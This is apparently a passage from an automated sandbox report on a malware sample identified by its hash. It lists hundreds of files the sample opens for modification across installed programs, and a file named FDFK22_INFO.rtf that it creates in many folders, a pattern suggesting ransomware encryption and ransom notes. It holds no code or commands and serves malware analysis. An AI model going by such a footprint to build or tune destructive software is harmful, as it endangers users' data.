a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vilnius a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belize a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Danmarkshavn a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmic.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\setup.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-9 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\ConfirmExport.jtx a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Pangnirtung a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+1 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.actionProvider.exsd a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Mendoza a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ko.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-api-caching.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\security\cacerts a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jrunscript.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Broken_Hill a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Mail\WinMail.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Riga a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Colombo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkDrop32x32.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Chisinau a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\javaws.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santarem a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cuiaba a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-modules.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.SYX a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santa_Isabel a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Athens a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\youtube.crx a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.runtime_3.10.0.v20140318-2214.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\THANKS.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Windhoek a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Miquelon a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Noronha a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Inuvik a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer.bat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pl.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\common.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\jamendo.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Explorer.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaw.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\sandbox.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\about.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt_0.12.1.v20140903-1023.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Swift_Current a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\net.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Casablanca a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-uisupport.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yakutat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nassau a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Edmonton a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Choibalsan a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Glace_Bay a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Rarotonga a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Athens a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Stockholm a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guyana a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\CIEXYZ.pf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Godthab a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Shanghai a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\sRGB.pf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkNoDrop32x32.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Regina a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\SmallLogoBeta.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_config_window.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\rockbox_fm_presets.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\CST6CDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program 